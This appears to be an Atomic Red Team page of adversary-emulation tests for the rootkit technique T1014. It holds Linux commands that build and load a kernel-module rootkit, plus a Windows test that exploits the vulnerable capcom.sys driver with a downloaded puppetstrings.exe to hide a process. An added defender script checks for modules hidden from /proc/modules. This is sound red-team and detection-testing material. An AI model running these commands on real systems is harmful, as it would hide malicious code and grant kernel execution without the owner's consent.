Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying the operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits, or rootkit-enabling functionality, may reside at the user or kernel level in the operating system or lower, including a hypervisor, the Master Boot Record, or system firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
Loadable Kernel Module based Rootkit
Supported Platforms: Linux
Name | Description | Type | Default Value |
---|---|---|---|
rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
rootkit_path | Path to rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko |
rootkit_name | Module name | String | T1014 |
temp_folder | Temp folder used to compile the code. Used when prerequisites are fetched. | path | /tmp/T1014 |
Attack Commands:
sudo insmod #{rootkit_path}
Cleanup Commands:
sudo rmmod #{rootkit_name}
Check Prereq Commands:
if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
Loadable Kernel Module based Rootkit
Supported Platforms: Linux
Name | Description | Type | Default Value |
---|---|---|---|
rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
rootkit_path | Path to rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko |
rootkit_name | Module name | String | T1014 |
temp_folder | Temp folder used to compile the code. Used when prerequisites are fetched. | path | /tmp/T1014 |
Attack Commands:
sudo modprobe #{rootkit_name}
Cleanup Commands:
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
Check Prereq Commands:
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
sudo cp #{temp_folder}/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
sudo depmod -a
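Both Loadable Kernel Module tests above load a module the way a real LKM rootkit would, and such a rootkit typically unlinks itself from the kernel's module list so that `lsmod` (which reads /proc/modules) no longer shows it, while its /sys/module entry usually remains. The following defender-side check is an added example, not part of the Atomic Red Team test; it compares the two views and flags modules present in one but not the other, using constructed sample data (the module name T1014 is taken from the test, the sample file layout is assumed).

```shell
#!/bin/sh
# Added example: detect kernel modules hidden from /proc/modules.
# hidden_modules PROC_FILE SYS_DIR
#   PROC_FILE: a file in /proc/modules format ("name size refcnt deps state addr")
#   SYS_DIR:   a directory whose subdirectories are module names (like /sys/module)
# Prints the name of every loaded module that has a sysfs entry but is
# missing from the module list; on a clean host it prints nothing.
hidden_modules() {
  proc_file="$1"
  sys_dir="$2"
  for d in "$sys_dir"/*/; do
    [ -d "$d" ] || continue
    name=$(basename "$d")
    # Only modules loaded from a .ko have an initstate file; built-in
    # components also get a /sys/module directory but never show in /proc/modules.
    [ -f "$d/initstate" ] || continue
    if ! awk -v n="$name" '$1 == n { found=1 } END { exit !found }' "$proc_file"; then
      echo "$name"
    fi
  done
}

# Constructed sample data (assumption, not captured from a real host): ext4 is
# listed normally, T1014 has a live sysfs entry but is absent from /proc/modules,
# and "kernel" is a built-in parameter directory without initstate.
build_sample() {
  sample="$1"
  mkdir -p "$sample/sys_module/T1014" "$sample/sys_module/ext4" "$sample/sys_module/kernel"
  echo live > "$sample/sys_module/T1014/initstate"
  echo live > "$sample/sys_module/ext4/initstate"
  printf 'ext4 720896 2 - Live 0x0000000000000000\n' > "$sample/proc_modules"
}

# Run the same comparison against the live system.
check_live_system() {
  hidden_modules /proc/modules /sys/module
}
```

On a real host, run `check_live_system` as root and treat any output as a module that has been removed from the kernel's module list and warrants investigation.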
This test exploits a signed driver to execute code in the kernel. This example was curated from a blog post that uses puppetstrings.exe with the vulnerable signed driver capcom.sys. The capcom.sys driver may be found on GitHub. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html (capcom.sys SHA1: C1D5CF8C43E7679B782630E93F5E6420CA1749A7). We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html. The SHA1 hash of our PoC exploit is DD8DA630C00953B6D5182AA66AF999B1E117F441. This will simulate hiding a process.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys |
puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe |
Attack Commands:
#{puppetstrings_path} #{driver_path}
Check Prereq Commands:
if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"